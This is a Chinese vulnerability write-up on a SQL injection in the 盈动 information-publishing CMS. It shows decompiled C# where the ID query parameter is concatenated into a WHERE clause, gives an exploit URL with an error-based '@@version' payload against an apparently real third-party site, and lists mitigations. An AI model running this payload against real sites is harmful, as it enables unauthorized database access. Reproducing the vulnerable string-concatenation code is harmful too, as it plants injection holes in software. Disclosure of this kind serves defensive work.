### 0x01 漏洞框架

系统:盈动信息发布系统

盈动信息发布系统为杭州东方盈动计算机网络工程有限公司一款cms产品。

注入:

问题文件:/sites/main/LRXZ.aspx

问题参数:ID

### 0x02 漏洞详情

代码分析:

```
protected void Page_Load(object sender, EventArgs e)
{
    略...
    string text;
    if (this.Page.Request.QueryString["ID"] != null)
    {
        text = this.Page.Request.QueryString["ID"];/*获取参数*/
    }
    else
    {
        text = "465";
    }
    this.lblID.Text = text;
    string condition = "ClassID='" + this.lblID.Text + "' AND WebID=1 AND Deleted='0'";/*直接拼接SQL*/
    this.GetPageInfo(condition);/*注入A*/
    this.BindData(condition);/*注入B*/
    }
}
```

this.GetPageInfo分析:

```
private void GetPageInfo(string condition)
{
    SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr());
    SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection);
    sqlCommand.CommandType = CommandType.StoredProcedure;
    sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles";
    sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize();
    sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = 1;
    sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = true;
    sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;/*将有问题的sql代入Get_SiteData_ByPagination存储过程*/
    sqlConnection.Open();
    this.PageInfo.set_RecordCount((int)sqlCommand.ExecuteScalar());
    sqlConnection.Close();
}
```

this.BindData分析:

```
private void BindData(string condition)
{
    this.mydatalist.DataSource = this.CreateSource(condition);/*跟进此方法*/
    略...
}
```

this.CreateSource:

```
private ICollection CreateSource(string condition)
{
    SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr());
    SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection);
    sqlCommand.CommandType = CommandType.StoredProcedure;
    sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles";
    sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize();
    sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = this.PageInfo.get_CurrentPageIndex();
    sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = false;
    sqlCommand.Parameters.Add("@FldName", SqlDbType.NVarChar, 255).Value = "OnTop DESC, UpdateTime";
    sqlCommand.Parameters.Add("@KeyFld", SqlDbType.NVarChar, 255).Value = "NewsID";
    sqlCommand.Parameters.Add("@OrderType", SqlDbType.Bit).Value = true;
    sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;/*将问题SQL直接代入 Get_SiteData_ByPagination*/
    SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
    DataSet dataSet = new DataSet("GuestList");
    sqlConnection.Open();
    sqlDataAdapter.Fill(dataSet, "Guest");
    sqlConnection.Close();
    return dataSet.Tables["Guest"].DefaultView;
}
```

漏洞利用:

http://www.jhjdedu.org/sites/main/LRXZ.aspx?id=2'and 1=@@version and'1'='1

Pocsuite:

### 0x03 修复方式

1、过滤漏洞文件参数(从上述代码看,condition 是作为整段 WHERE 子句经 @StrWhere 传入存储过程的,因此仅靠 SqlParameter 并不能阻止注入;ID 只应为整数,应在拼接 condition 之前先校验并转换为整数)

2、使用加速乐等防护产品